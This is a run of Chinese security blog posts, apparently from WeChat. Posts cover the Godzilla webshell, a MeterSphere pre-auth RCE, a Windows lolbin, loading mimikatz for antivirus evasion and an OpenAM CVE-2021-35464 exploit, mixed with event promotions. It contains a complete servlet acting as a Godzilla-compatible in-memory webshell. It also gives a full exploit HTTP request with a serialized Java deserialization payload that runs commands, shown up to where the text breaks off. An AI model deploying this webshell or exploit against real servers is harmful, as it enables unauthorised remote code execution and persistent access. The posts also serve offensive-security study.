原创 ChaBug 2022-04-16 11:39

前言注入内存马借助当前的webshell工具而言，冰蝎可以通过创建hashmap放入request、resp

前言

注入内存马借助当前的webshell工具而言，冰蝎可以通过创建hashmap放入request、response、session替换pagecontext来解决

HttpSession session = lastRequest.getSession();pageContext.put("request", lastRequest);pageContext.put("response", lastResponse);pageContext.put("session", session);

能这么写的原因是因为冰蝎做了处理

会从传入的obj中分别取到request、response、session。

而哥斯拉没有这么做，如何破局？

哥斯拉连接分析

哥斯拉是基于动态加载class字节码实现的webshell工具。

先看一下jsp的shell

<%! String xc = "3c6e0b8a9c15224a";    String pass = "pass";    String md5 = md5(pass + xc);
    class X extends ClassLoader {        public X(ClassLoader z) {            super(z);        }
        public Class Q(byte[] cb) {            return super.defineClass(cb, 0, cb.length);        }    }....省略加密解密的函数....%><%    try {        byte[] data = base64Decode(request.getParameter(pass));        data = x(data, false);        if (session.getAttribute("payload") == null) {            session.setAttribute("payload", new X(this.getClass().getClassLoader()).Q(data));        } else {            request.setAttribute("parameters", data);            java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream();            Object f=((Class)session.getAttribute("payload")).newInstance();            f.equals(arrOut);            f.equals(pageContext);            response.getWriter().write(md5.substring(0, 16));            f.toString();            response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));            response.getWriter().write(md5.substring(16));        }    } catch (Exception e) {    }%>

先判断session中payload是否为空，如果为空就用classloader加载解密之后的字节码data。

如果不为空将data赋值到session的parameters参数，然后从session中拿到定义的payload类，创建实例再进行了两次equals和一次tostring，两次equals分别传入ByteArrayOutputStream和pageContext。

通过bp代理看一下“测试连接”的过程

点完测试连接后bp多了两个请求

再点success的确定按钮后又多了一个请求。

一共三个请求，这三个请求分别干了什么？

为了调试，我们需要反编译哥斯拉源码找到godzilla\shells\payloads\java\assets\payload.classs文件，反编译回来后在idea项目中创建一个payload类，将源码粘贴进去。另外还需要关闭idea的自动tostring。

然后修改jsp让其加载我们自己的payload.class而非从session中加载

<%    try {        byte[] data = base64Decode(request.getParameter(pass));        data = x(data, false);        if (session.getAttribute("payload") == null) {            session.setAttribute("payload", new X(this.getClass().getClassLoader()).Q(data));        } else {            request.setAttribute("parameters", data);            java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream();            Object f = ((Class) Class.forName("payload")).newInstance();            f.equals(arrOut);            f.equals(pageContext);            response.getWriter().write(md5.substring(0, 16));            f.toString();            response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));            response.getWriter().write(md5.substring(16));        }    } catch (Exception e) {    }%>

payload类结构

payload类是哥斯拉的功能实现类，其中有多个函数比如文件操作、命令执行等功能实现

而入口在equals()函数

handle()是真正的逻辑，noLog是不记录tomcat连接日志的函数。进入handle看下

public boolean handle(Object obj) {    if (obj == null) {        return false;    } else {        Class streamClazz = ByteArrayOutputStreamClazz;        if (streamClazz == null) {            try {                streamClazz = Class.forName("java.io.ByteArrayOutputStream");            } catch (ClassNotFoundException var7) {                throw new NoClassDefFoundError(var7.getMessage());            }
            ByteArrayOutputStreamClazz = streamClazz;        }
        if (streamClazz.isAssignableFrom(obj.getClass())) {            this.outputStream = (ByteArrayOutputStream) obj;            return false;        } else {            if (this.supportClass(obj, "%s.servlet.http.HttpServletRequest")) {                this.servletRequest = obj;            } else if (this.supportClass(obj, "%s.servlet.ServletRequest")) {                this.servletRequest = obj;            } else {                streamClazz = byteArrayClazz;                if (streamClazz == null) {                    try {                        streamClazz = Class.forName("[B");                    } catch (ClassNotFoundException var6) {                        throw new NoClassDefFoundError(var6.getMessage());                    }
                    byteArrayClazz = streamClazz;                }
                if (streamClazz.isAssignableFrom(obj.getClass())) {                    this.requestData = (byte[]) obj;                } else if (this.supportClass(obj, "%s.servlet.http.HttpSession")) {                    this.httpSession = obj;                }            }
            this.handlePayloadContext(obj);            if (this.servletRequest != null && this.requestData == null) {                Object var10001 = this.servletRequest;                Class[] var10003 = new Class[1];                Class var10006 = stringClazz;                if (var10006 == null) {                    try {                        var10006 = Class.forName("java.lang.String");                    } catch (ClassNotFoundException var5) {                        throw new NoClassDefFoundError(var5.getMessage());                    }
                    stringClazz = var10006;                }
                var10003[0] = var10006;                Object retVObject = this.getMethodAndInvoke(var10001, "getAttribute", var10003, new Object[]{"parameters"});                if (retVObject != null) {                    streamClazz = byteArrayClazz;                    if (streamClazz == null) {                        try {                            streamClazz = Class.forName("[B");                        } catch (ClassNotFoundException var4) {                            throw new NoClassDefFoundError(var4.getMessage());                        }
                        byteArrayClazz = streamClazz;                    }
                    if (streamClazz.isAssignableFrom(retVObject.getClass())) {                        this.requestData = (byte[]) retVObject;                    }                }            }            return true;        }    }}

分段来看，第一次equals的时候传入的是ByteArrayOutputStream实例

将其赋值给this.outputStream，this.outputStream是输出流，存储了response内容。

第二段equals的是pagecontext

image.png

先填充request，然后判断是否是session，如果是字节数组则说明是post参数 this.requestData = (byte[]) obj; 如果是HttpSession实例则放入this.httpSession

接着handlePayloadContext()填充request上下文和session

image.png

然后调用session.getAttribute("parameters")拿到requestData

第三段是toString

initSessionMap()初始化一个sessionMap放一些信息，然后formatParameter格式化参数map，然后this.run()

在formatParameter()函数中向参数map中放键值对

image.png

给他打印出来看一看，bp三个请求打印了两个键值对

image.png

第一个请求是加载class字节码的，然后第二个第三个请求时调用字节码功能，通过methodName来调用。接着run()完之后写输出。

那么请求流程就到这里，接下来看如何解决

解决pagecontext

上文讲到，requestData是post body，我们传入pagecontext的目的是为了通过session拿到parameters，那么如果我们抛弃session，直接把parameters通过equals函数传给payload类呢？

image.png

bp第一个请求是加载字节码，我们通过defClass加载进去，然后第二个请求分为四个阶段

1.equals传入ByteArrayOutputStream实例填充outputStream2.equals传递解码之后的data填充requestData3.equals传递HttpServletRequest填充request4.toString写response输出结果

而在第二阶段正是因为在payload#handle()中这段代码的出现解决了pagecontext

image.png

完整代码

package com.example.demo3;
import javax.servlet.ServletException;import javax.servlet.annotation.WebServlet;import javax.servlet.http.HttpServlet;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import java.io.IOException;import java.lang.reflect.Method;import java.net.URL;import java.net.URLClassLoader;
@WebServlet(name = "helloServlet", value = "/hello")public class HelloServlet extends HttpServlet {    String xc = "3c6e0b8a9c15224a";    String pass = "pass";    String md5 = md5(pass + xc);    Class payload;
    public static String md5(String s) {        String ret = null;        try {            java.security.MessageDigest m;            m = java.security.MessageDigest.getInstance("MD5");            m.update(s.getBytes(), 0, s.length());            ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();        } catch (Exception e) {        }        return ret;    }
    public static String base64Encode(byte[] bs) throws Exception {        Class base64;        String value = null;        try {            base64 = Class.forName("java.util.Base64");            Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);            value = (String) Encoder.getClass().getMethod("encodeToString", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bs});        } catch (Exception e) {            try {                base64 = Class.forName("sun.misc.BASE64Encoder");                Object Encoder = base64.newInstance();                value = (String) Encoder.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bs});            } catch (Exception e2) {            }        }        return value;    }
    public static byte[] base64Decode(String bs) throws Exception {        Class base64;        byte[] value = null;        try {            base64 = Class.forName("java.util.Base64");            Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);            value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{bs});        } catch (Exception e) {            try {                base64 = Class.forName("sun.misc.BASE64Decoder");                Object decoder = base64.newInstance();                value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{bs});            } catch (Exception e2) {            }        }        return value;    }
    public byte[] x(byte[] s, boolean m) {        try {            javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES");            c.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES"));            return c.doFinal(s);        } catch (Exception e) {            return null;        }    }
    public Class defClass(byte[] classBytes) throws Throwable {        URLClassLoader urlClassLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader());        Method defMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);        defMethod.setAccessible(true);        return (Class) defMethod.invoke(urlClassLoader, classBytes, 0, classBytes.length);    }
    @Override    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {        try {            byte[] data = base64Decode(req.getParameter(pass));            data = x(data, false);            if (payload == null) {                payload = defClass(data);            } else {                java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream();                Object f = payload.newInstance();                f.equals(arrOut);                f.equals(data);                f.equals(req);                resp.getWriter().write(md5.substring(0, 16));                f.toString();                resp.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));                resp.getWriter().write(md5.substring(16));            }        } catch (Throwable e) {        }    }}

文末

其实完整代码还是北辰发我的，我只是探究了一下其原因，这种pagecontext的问题还是得深入看工具的功能实现才能解决问题。

另外自己在写冰蝎内存马的时候遇到了包装类的问题，而哥斯拉不存在这个问题。因为哥斯拉是通过参数传递的payload，而冰蝎是直接把字节码放在了body中。

image.png

只能说哥斯拉yyds!

分享、点赞、在看就是对我们的一种支持！

阅读原文

跳转微信打开

MeterSphere PluginController Pre-auth RCE

Thu, 13 Jan 2022 11:10:00 +0800

ChaBug 2022-01-13 11:10

请尊重原创创作来之不易就在我发这篇文章之时，我发现了意外情况作为公众号撰写者，请尊重原创创作来之不易。禁止在

请尊重原创创作来之不易

就在我发这篇文章之时，我发现了意外情况

作为公众号撰写者，请尊重原创创作来之不易。禁止在未经允许的情况下私自盗用他人文章进行发布并获取流量等其他收益，日后发布的文章发现未经允许盗用者一律举报投诉，谢谢。

搭建环境

wget https://github.com/metersphere/metersphere/releases/download/v1.16.3/metersphere-online-installer-v1.16.3.tar.gztar zxvf metersphere-online-installer-v1.16.3.tar.gzcd metersphere-online-installer-v1.16.3/MSVERSION="v1.16.3"echo $MSVERSIONsed -i -e "s#MS_IMAGE_TAG=.*#MS_IMAGE_TAG=${MSVERSION}#g" install.confsed -i -e "s#MS_IMAGE_PREFIX=.*#MS_IMAGE_PREFIX=registry.cn-qingdao.aliyuncs.com\/metersphere#g" install.conf/bin/bash install.sh

搭建完运行在http://172.16.16.129:8081/ docker中 msctl status可以看到状态。

分析漏洞

根据diff https://github.com/metersphere/metersphere/compare/v1.16.3...v1.16.4

删除了/plugin/**路由的anon权限，也就是说原来访问/plugin/是不需要授权的。

找到路由对应的controller io.metersphere.controller.PluginController

主要关注两个函数 add 和 customMethod

add函数中上传文件跟进到io.metersphere.service.PluginService#editPlugin

io.metersphere.commons.utils.FileUtils#create将上传的文件拼接写入到 /opt/metersphere/data/body/plugin 目录下

文件名形如/opt/metersphere/data/body/plugin/490fb08a-eae3-4414-a991-09f16f5b8f5e_test.jar

写入之后进入io.metersphere.service.PluginService#getMethod

继续跟进this.loadJar()

这里将上传的文件通过URLClassLoader加载进来，那么我们可以通过上传jar包，向内存中注册任意类。

接下来再看io.metersphere.controller.PluginController#customMethod

跟进到io.metersphere.service.PluginService#customMethod

Class.forName参数可控，我们可以在上文的jar包中写一个customMethod函数，这样就可以执行任意java代码了。

整个流程就是写一个Evil类，类中定义一个customMethod函数，打成jar包上传来向内存中注册class，然后通过customMethod路由调用jar包中的Evil类customMethod函数。

复现截图

分享、点赞、在看就是对我们的一种支持！

阅读原文

跳转微信打开

冬奥网络安全卫士招募正式启动！

Fri, 17 Dec 2021 10:00:00 +0800

ChaBug 2021-12-17 10:00

12月16日，北京冬奥组委技术部组织招募白帽黑客作为“冬奥网络安全卫士”参与北京冬奥会网络安全工作。

奥运史上首次公开招募白帽黑客共同守护冬奥网络安全。12月16日，北京冬奥组委技术部组织招募白帽黑客作为“冬奥网络安全卫士”参与北京冬奥会网络安全工作，由北京2022年冬奥会官方赞助商奇安信及旗下补天漏洞响应平台提供技术平台和运营支持。这将是白帽黑客第一次有机会在冬奥会这一世界顶级体育赛事中贡献自己的力量。

北京打造科技冬奥

网络安全不容忽视

继2008年成功举办过夏季奥运会，北京将在50天后举办冬季奥运会，成为真正的“双奥之城”。作为全球首次5G全覆盖的冬奥会，比赛场馆的运动科技，“5G+8K”、VR虚拟导览系统的智慧观赛等，为即将开幕的北京冬奥会增添了十足的科技感。

5G和物联网的全面应用，使网络安全成为冬奥会成功举办的重要保障，北京2022年冬奥会和冬残奥会赞助商体系中首设网络安全类别，奇安信也由此成为奥林匹克历史上第一个网络安全服务和杀毒软件官方赞助商。

冬奥会的网络安全需求更加复杂，作为一个完全开放的系统，面临着四大难点：基础设施多，防守面积大；赛会场馆多，地域分布广；专业系统多，厂商国际化；参会人员多，持续时间长。

目前，北京冬奥会筹办工作已进入最后的决战决胜阶段，为做好北京冬奥会网络安全工作、集结更多网络安全保卫力量，北京冬奥组委技术部牵头组织数百名网络安全专业人员，作为“冬奥网络安全卫士”，共同参与北京冬奥会网络安全工作，为守护冬奥网络安全贡献专业力量。

冬奥会公开招募白帽力量参与网络安全工作尚属首次。“冬奥网络安全卫士”需通过补天平台，在可信可管可控的情况下，线上参与工作，为冬奥网络安全提供支持。

受聘白帽精英“万里挑一”

北京冬奥组委技术部

将颁发正式聘书

本次招募面向年满18周岁的中国公民，无论你是就读于网络安全相关专业的学生，还是潜心“挖洞”的技术爱好者，均可报名。

国内最大的第三方漏洞响应平台补天漏洞响应平台目前已有注册白帽专家9万人，再加上计算机、网络安全专业学生，及有志向为冬奥会贡献力量的各行业人士，预计“冬奥网络安全卫士”的招募将是“万里挑一”。

这将是一支由知名漏洞平台的顶级白帽、在网络安全大赛中获得奖项的实力白帽、为企业SRC做出突出贡献的资深白帽等组成的“中国网安力量”，共同参与冬奥网络安全守护。

-扫码立即报名-

感谢以下行业伙伴的支持

END

阅读原文

跳转微信打开

WorkFolders.exe 一个新的lolbin

Fri, 22 Oct 2021 09:06:00 +0800

Y4er 2021-10-22 09:06

逛推特发现一个新的lolbin

https://twitter.com/ElliotKillick/status/1449812843772227588?s=20

用法如下

可能问题发生在于WorkFolders.exe调用ShellExecute()执行当前目录下的control.exe，有点dll劫持的味儿了。

阅读原文

跳转微信打开

警钟长鸣，勿忘国耻，吾辈自强

Sat, 18 Sep 2021 11:20:00 +0800

2021-09-18 11:20

跳转微信打开

BadBlood：打造真实环境的LDAP靶场

Tue, 31 Aug 2021 19:55:00 +0800

原创 Y4er 2021-08-31 19:55

BadBlood是一个老外在GitHub上的项目，作用是用于填充AD域中的活动目录(LDAP)，来创建一个接近于真实世界的域环境。

人翻+机翻大概看得懂就行

BadBlood

BadBlood是一个老外在GitHub上的项目，作用是用于填充AD域中的活动目录(LDAP)，来创建一个接近于真实世界的域环境。

每次运行这个工具所产生的计算机、组、用户、ACL都不同，用来搭建靶场美滋滋。

官方文档：https://www.secframe.com/badblood/

使用方法

在域控制器上使用域管账户运行

git clone https://github.com/davidprowe/badblood.git
./badblood/invoke-badblood.ps1

1. 安装LAPS

Badblood 通过安装 LAPS 来扩展当前域的架构 AD_Laps_install\InstallLAPSSchema.ps1，LAPS是 Microsoft 的免费工具，通过随机生成密码来修复跨域的横向移动。

2. OU创建

AD_OU_CreateStructure\CreateOUStructure.ps1

默认配置文件3lettercodes.csv里可以修改OU的结构。详细的子结构也可以修改createoustructure.ps1中的变量，该工具的第一个版本创建了一个类似于下图所示的 OU 结构。BadBlood 使用这种新的 OU 结构来随机化对象和权限的放置。

3. 用户创建

AD_Groups_Create\CreateGroups.ps1

OU创建完之后，开始在域中创建随机数量的用户(500-10000)。在创建每个用户期间，BadBlood 随机选择一个 OU 并将该人置于随机路径中。该工具根据 AD_Users_Create\Names 文件夹中的文本文件生成非常随机的男性和女性用户。此外，每个用户都使用唯一的密码创建。

4. 组创建

AD_Groups_Create\CreateGroups.ps1

这些组在此脚本中随机命名，从与脚本位于同一文件夹中的 hotmail.txt 文件中提取信息。组，就像用户一样，随机放置在域中的随机 OU 和容器中。

5. 创建计算机

AD_Computers_Create\CreateComputers.ps1

这些计算机也有随机生成的名称。与之前创建的其他对象一样，计算机被放置在随机 OU 中。如果您想使用此工具创建更多计算机，请在 Invoke-BadBlood 脚本中编辑变量 $NumOfComps。

6. 创建ACL

AD_Permission_Randomizer\GenerateRandomPermissions.ps1

这是 BadBlood 最引以为豪的部分。此脚本从文件夹 AD_OU_SetACL 调用和导入函数。这个文件夹中有很多脚本，每个脚本里面都有很多功能。它们可用于自动执行管理员在工作日可能遇到的许多 Active Directory 权限任务。

7. 将对象添加到组

Ad_Groups_Create\AddRandomToGroups.ps1

注意用户数、计算机数、组数、ACL 数和关系数展开的组成员身份

效果

通过Bloodhound收集到的LDAP信息如图

阅读原文

跳转微信打开

通过PELoader加载mimikatz

Mon, 30 Aug 2021 18:00:00 +0800

原创 Y4er 2021-08-30 18:00

闲着逛Twitter看到老外用dotnet core写了个peloader来加载mimikatz，学一下。

最近离职在家，闲着逛Twitter看到老外用dotnet core写了个peloader来加载mimikatz，学一下。

项目地址：https://github.com/secdev-01/Mimikore

dotnet core可以打包成大文件，但是体积太大了

dotnet publish -r win-x64 -c Release /p:PublishSingleFile=true /p:IncludeNativeLibrariesForSelfExtract=true --self-contained true

一个mimikatz打包下来20M，免杀有点效果，当作学习思路吧。

https://www.virustotal.com/gui/file/2a7a24e81c5672f694d2adc18a5b0c0713910d3711924a218e7cc8229e1464f1/detection

看了看GitHub上 Casey Smith 还写了一个PELoader，可以直接用dotnet framework运行，体积比上面那个小得多。

https://github.com/rvrsh3ll/PELoader/blob/master/Loader.cs

代码差别不大，直接用就行了，这里就不提了。

一直觉得dotnet core在红队开发中应该大有可为，现在面临的最大问题就是打包体积太大，唉硬伤啊，只能等微软的进一步开发计划了。

凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数

阅读原文

跳转微信打开

抢先看！“补天白帽大会”全议程公布！六大亮点不容错过！

Thu, 29 Jul 2021 18:28:00 +0800

白帽大会 2021-07-29 18:28

注意查收！“补天白帽大会” 全议程已更新！速来！8月11日行业大咖齐聚补天白帽大会，畅聊技术，放肆high玩

注意查收！

“补天白帽大会” 全议程已更新！

速来！

8月11日行业大咖齐聚补天白帽大会，畅聊技术，放肆high玩！六大亮点，期待你的到来！

“2021补天白帽大会”惊喜不断，这里有：极具价值的报告分析、重量级的奖项颁布、热门的议题云集、烧脑的破解游戏、酷炫的神兵集结、疯狂的白帽之夜。想知道还有什么惊喜，请亲自来到现场！

六大亮点

亮点一

发布白帽人才报告

解读白帽历年趋势变化

白帽子帮助企业发现漏洞，在企业安全建设中承担重要的角色，他们是网络安全圈内最“潮”的人。本次大会将为大家带来《2021中国白帽子人才报告》，分析最新的人才数据和历年趋势变化，洞见当代白帽价值。

亮点二

奖励优秀白帽及SRC

双项重量级颁奖首次颁布

2021补天白帽大会首次采用“6+1”颁奖模式，包括由补天平台颁发的六个“补天年度大奖”和一个由特邀专家和特邀白帽及大众共同评选的“补天繁星奖”。补天作为企业与白帽子的桥梁，秉持客观、公正、专业的态度，为所有奋战在一线的网络安全从业者加油鼓气。

亮点三

高质量议题云集

白帽最关心的热门话题这里都有

如果太空发射的时候信号被拦截了怎么办？加密货币没有想象中的那么安全？云原生容器集群最经常被攻击者完整控制的方式是什么呢？供应链攻击仅仅是软件投毒吗？如何实现零接触控车？硬核的windows漏洞挖掘是怎样的？大会邀请到多位行业大咖，议题从卫星安全到加密货币安全，从云上攻击到供应链攻击。还有保留项目二进制漏洞挖掘及分享多个汽车漏洞挖掘思路。

注：最终议程以实际安排为准

亮点四

探索Xspace

体验破解乐趣赢超级大礼

大会直击Xspace现场，设置Lock Collection、Car Collection两大项目。通过破解锁和无人驾驶车，各路英雄大展身手，攻克一个个关卡，探索技术乐趣，挑战成功的英雄还将获得超级大礼！

亮点五

神兵集结Tools Collection论坛

共铸网安利器

在Tools Collection论坛上展示8大开源工具，同时首创评选机制，开源的本质是共享技术，技术的共享开源是开源精神的诞生，希望能够磨砺更多神兵利器，推动网络安全向前发展进步。

亮点六

白帽放肆high

纵享巨浪之夜

结束一天的补天白帽大会议程，卸下一天的紧张与忙碌，让孤独的“漏洞”战场守夜猎人尽情释放自我！我们为白帽子提供一个汲取干货、嗨fun一夏的机会。我们呈现的不仅仅是一场音乐演出，我们要让迷人的乐队、迷幻的灯光、澎湃的曲调贯穿白帽之夜的每个角落、冲击每个新时代白帽子的灵魂！还有更多你意想不到的惊喜！大家一起燥起来吧！

当然啦，

大会的精彩不止于此，

心动不如行动，

快来大会现场亲自体验吧！

长按识别下方二维码，

速速报名！

扫码报名

阅读原文

跳转微信打开

openam-CVE-2021-35464 tomcat 执行命令回显

Fri, 02 Jul 2021 12:34:00 +0800

原创 Y4er 2021-07-02 12:34

github项目地址https://github.com/Y4er/openam-CVE-2021-3546

github项目地址

https://github.com/Y4er/openam-CVE-2021-35464

项目基于 ysoserial^[1] 和 Java-Rce-Echo^[2]

构建项目需要在依赖中加入ysoserial.jar和jato-14.6.3.jar

POST /OpenAM/ccversion/Version HTTP/1.1Host: php.local:8081Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 10559cmd:dir
jato.pageSession=AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAABRfyv66vgAAADQBBgoARgCKCgCLAIwKAIsAjQoAHQCOCAB7CgAbAI8KAJAAkQoAkACSBwB8CgCLAJMIAJQKACAAlQgAlggAlwcAmAgAmQgAWQcAmgoAGwCbCACcCABxBwCdCwAWAJ4LABYAnwgAaAgAoAcAoQoAGwCiBwCjCgCkAKUIAKYHAKcIAKgKACAAqQgAqgkAJQCrBwCsCgAlAK0IAK4KAK8AsAoAIACxCACyCACzCAC0CAC1CAC2BwC3BwC4CgAwALkKADAAugoAuwC8CgAvAL0IAL4KAC8AvwoALwDACgAgAMEIAMIKABsAwwoAGwDECADFBwBlCgAbAMYIAMcHAMgIAMkIAMoHAMsKAEMAzAcAzQcAzgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy9Ub21jYXRFY2hvSW5qZWN0OwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwDPAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAAWUBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAA2NscwEAEUxqYXZhL2xh